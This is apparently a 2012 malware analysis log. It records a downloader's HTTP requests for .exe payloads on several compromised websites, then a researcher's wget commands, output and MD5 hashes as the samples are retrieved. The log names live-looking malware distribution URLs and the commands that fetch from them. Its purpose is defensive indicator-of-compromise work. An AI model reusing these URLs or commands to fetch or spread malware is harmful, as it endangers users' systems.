www.gamarubber.com          212.36.8.230
www.10130138.wavelearn.de   213.157.16.3
hotnewinfo.info             174.120.83.189
saltasalta.cl               200.29.152.130
www.google.com              74.125.141.104

HTTP Requests
URL / Data

http://brianjameswhite.com/7VTUy.exe
  GET /7VTUy.exe HTTP/1.0
  Host: brianjameswhite.com
  Accept: */*
  Accept-Encoding: identity, *;q=0
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

http://estilianaragdolls.de/Si7ySG.exe
  GET /Si7ySG.exe HTTP/1.0
  Host: estilianaragdolls.de
  Accept: */*
  Accept-Encoding: identity, *;q=0
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

http://kuntticaret.com/v6e7WMJ.exe
  GET /v6e7WMJ.exe HTTP/1.0
  Host: kuntticaret.com
  Accept: */*
  Accept-Encoding: identity, *;q=0
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

http://www.gamarubber.com/NPY.exe
  GET /NPY.exe HTTP/1.0
  Host: www.gamarubber.com
  Accept: */*
  Accept-Encoding: identity, *;q=0
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

http://www.10130138.wavelearn.de/4pxp.exe
  GET /4pxp.exe HTTP/1.0
  Host: www.10130138.wavelearn.de
  Accept: */*
  Accept-Encoding: identity, *;q=0
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

http://hotnewinfo.info/8fhr0.exe
  GET /8fhr0.exe HTTP/1.0
  Host: hotnewinfo.info
  Accept: */*
  Accept-Encoding: identity, *;q=0
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

http://saltasalta.cl/8Mo.exe
  GET /8Mo.exe HTTP/1.0
  Host: saltasalta.cl
  Accept: */*
  Accept-Encoding: identity, *;q=0
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Domain lookups:
Resolving brianjameswhite.com... 97.74.215.61
Resolving estilianaragdolls.de... 217.119.58.37
Resolving kuntticaret.com... 94.199.206.44
Resolving www.gamarubber.com... 212.36.8.230
Resolving www.10130138.wavelearn.de... 213.157.16.3
Resolving hotnewinfo.info... 174.120.83.189
Resolving saltasalta.cl... 200.29.152.130

Malware EXE's downloaded:
Saving to: "Si7ySG.exe"
Saving to: "v6e7WMJ.exe"
Saving to: "NPY.exe"
Saving to: "4pxp.exe"
Saving to: "8fhr0.exe"
Saving to: "8Mo.exe"

$ ls -l Si7ySG.exe v6e7WMJ.exe NPY.exe 4pxp.exe 8fhr0.exe 8Mo.exe
431376 Oct 30 13:00 4pxp.exe
431376 Oct 30 13:01 8fhr0.exe
431376 Oct 30 13:00 8Mo.exe
431376 Oct 30 13:02 NPY.exe
431376 Oct 30 13:01 Si7ySG.exe
431376 Oct 30 13:01 v6e7WMJ.exe

$ md5sum Si7ySG.exe v6e7WMJ.exe NPY.exe 4pxp.exe 8fhr0.exe 8Mo.exe
f60566d2de1a221a37ddbcd880e8a184  Si7ySG.exe
f60566d2de1a221a37ddbcd880e8a184  v6e7WMJ.exe
f60566d2de1a221a37ddbcd880e8a184  NPY.exe
f60566d2de1a221a37ddbcd880e8a184  4pxp.exe
f60566d2de1a221a37ddbcd880e8a184  8fhr0.exe
f60566d2de1a221a37ddbcd880e8a184  8Mo.exe

--------------------------------------------------------------------------------

Wget logs:

$ wget -Sv --keep-session-cookies --save-cookies cookies-2 --user-agent="Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" --referer="" http://brianjameswhite.com/7VTUy.exe
--2012-10-30 13:27:41--  http://brianjameswhite.com/7VTUy.exe
Resolving brianjameswhite.com... 97.74.215.61
Connecting to brianjameswhite.com|97.74.215.61|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.1 404 Not Found
  Cache-Control: no-cache, must-revalidate, max-age=0
  Pragma: no-cache
  Content-Type: text/html
  Expires: Wed, 11 Jan 1984 05:00:00 GMT
  Last-Modified: Tue, 30 Oct 2012 12:27:43 GMT
  Server: Microsoft-IIS/7.0
  X-Pingback: http://brianjameswhite.com/xmlrpc.php
  X-Powered-By: ASP.NET
  Date: Tue, 30 Oct 2012 12:27:43 GMT
  Connection: keep-alive
  Content-Length: 1549
2012-10-30 13:27:42 ERROR 404: Not Found.

$ wget -Sv --keep-session-cookies --save-cookies cookies-2 --user-agent="Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" --referer="" http://estilianaragdolls.de/Si7ySG.exe
--2012-10-30 13:27:51--  http://estilianaragdolls.de/Si7ySG.exe
Resolving estilianaragdolls.de... 217.119.58.37
Connecting to estilianaragdolls.de|217.119.58.37|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.1 200 OK
  Date: Tue, 30 Oct 2012 12:27:53 GMT
  Server: Apache
  Last-Modified: Tue, 30 Oct 2012 12:01:12 GMT
  ETag: "bc50a8c-69510-8acd7200"
  Accept-Ranges: bytes
  Content-Length: 431376
  Keep-Alive: timeout=3, max=25
  Connection: Keep-Alive
  Content-Type: application/x-msdos-program
Length: 431376 (421K) [application/x-msdos-program]
Saving to: "Si7ySG.exe"

100%[================>] 431,376     1.02M/s   in 0.4s

2012-10-30 13:27:52 (1.02 MB/s) - "Si7ySG.exe" saved [431376/431376]

$ wget -Sv --keep-session-cookies --save-cookies cookies-2 --user-agent="Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" --referer="" http://kuntticaret.com/v6e7WMJ.exe
--2012-10-30 13:28:02--  http://kuntticaret.com/v6e7WMJ.exe
Resolving kuntticaret.com... 94.199.206.44
Connecting to kuntticaret.com|94.199.206.44|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Date: Tue, 30 Oct 2012 12:28:02 GMT
  Server: LiteSpeed
  Accept-Ranges: bytes
  Connection: close
  ETag: "69510-508fc1ad-0"
  Last-Modified: Tue, 30 Oct 2012 12:01:49 GMT
  Content-Type: application/octet-stream
  Content-Length: 431376
  X-Powered-By: PleskLin
Length: 431376 (421K) [application/octet-stream]
Saving to: "v6e7WMJ.exe"

100%[================>] 431,376     973K/s   in 0.4s

2012-10-30 13:28:02 (973 KB/s) - "v6e7WMJ.exe" saved [431376/431376]

$ wget -Sv --keep-session-cookies --save-cookies cookies-2 --user-agent="Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" --referer="" http://www.gamarubber.com/NPY.exe
--2012-10-30 13:28:19--  http://www.gamarubber.com/NPY.exe
Resolving www.gamarubber.com... 212.36.8.230
Connecting to www.gamarubber.com|212.36.8.230|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.1 200 OK
  Date: Tue, 30 Oct 2012 12:28:21 GMT
  Server: Apache/1.3.41 (Unix) PHP/4.4.7 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8h
  Last-Modified: Tue, 30 Oct 2012 12:02:03 GMT
  ETag: "130c85-69510-508fc1bb"
  Accept-Ranges: bytes
  Content-Length: 431376
  Keep-Alive: timeout=15, max=100
  Connection: Keep-Alive
  Content-Type: application/octet-stream
Length: 431376 (421K) [application/octet-stream]
Saving to: "NPY.exe"

100%[================>] 431,376     227K/s   in 1.9s

2012-10-30 13:28:21 (227 KB/s) - "NPY.exe" saved [431376/431376]

$ wget -Sv --keep-session-cookies --save-cookies cookies-2 --user-agent="Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" --referer="" http://www.10130138.wavelearn.de/4pxp.exe
--2012-10-30 13:28:36--  http://www.10130138.wavelearn.de/4pxp.exe
Resolving www.10130138.wavelearn.de... 213.157.16.3
Connecting to www.10130138.wavelearn.de|213.157.16.3|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.1 200 OK
  Date: Tue, 30 Oct 2012 12:28:35 GMT
  Server: Microsoft-IIS/5.0
  Last-Modified: Tue, 30 Oct 2012 12:00:21 GMT
  ETag: "a801a-69510-508fc155"
  Accept-Ranges: bytes
  Content-Length: 431376
  Keep-Alive: timeout=15, max=100
  Connection: Keep-Alive
  Content-Type: application/octet-stream
Length: 431376 (421K) [application/octet-stream]
Saving to: "4pxp.exe"

100%[================>] 431,376     880K/s   in 0.5s

2012-10-30 13:28:37 (880 KB/s) - "4pxp.exe" saved [431376/431376]

$ wget -Sv --keep-session-cookies --save-cookies cookies-2 --user-agent="Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" --referer="" http://hotnewinfo.info/8fhr0.exe
--2012-10-30 13:28:54--  http://hotnewinfo.info/8fhr0.exe
Resolving hotnewinfo.info... 174.120.83.189
Connecting to hotnewinfo.info|174.120.83.189|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.1 200 OK
  Date: Tue, 30 Oct 2012 12:28:56 GMT
  Server: Apache
  Last-Modified: Tue, 30 Oct 2012 12:01:22 GMT
  Accept-Ranges: bytes
  Content-Length: 431376
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
  X-Pad: avoid browser bug
Length: 431376 (421K) [application/x-msdownload]
Saving to: "8fhr0.exe"

100%[================>] 431,376     437K/s   in 1.0s

2012-10-30 13:28:55 (437 KB/s) - "8fhr0.exe" saved [431376/431376]

$ wget -Sv --keep-session-cookies --save-cookies cookies-2 --user-agent="Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" --referer="" http://saltasalta.cl/8Mo.exe
--2012-10-30 13:29:06--  http://saltasalta.cl/8Mo.exe
Resolving saltasalta.cl... 200.29.152.130
Connecting to saltasalta.cl|200.29.152.130|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.1 200 OK
  Date: Tue, 30 Oct 2012 12:29:06 GMT
  Server: Apache
  Last-Modified: Tue, 30 Oct 2012 12:00:20 GMT
  Accept-Ranges: bytes
  Content-Length: 431376
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
Length: 431376 (421K) [application/x-msdownload]
Saving to: "8Mo.exe"

100%[================>] 431,376     7.35K/s   in 47s

2012-10-30 13:29:54 (8.93 KB/s) - "8Mo.exe" saved [431376/431376]

--------------------------------------------------------------------------------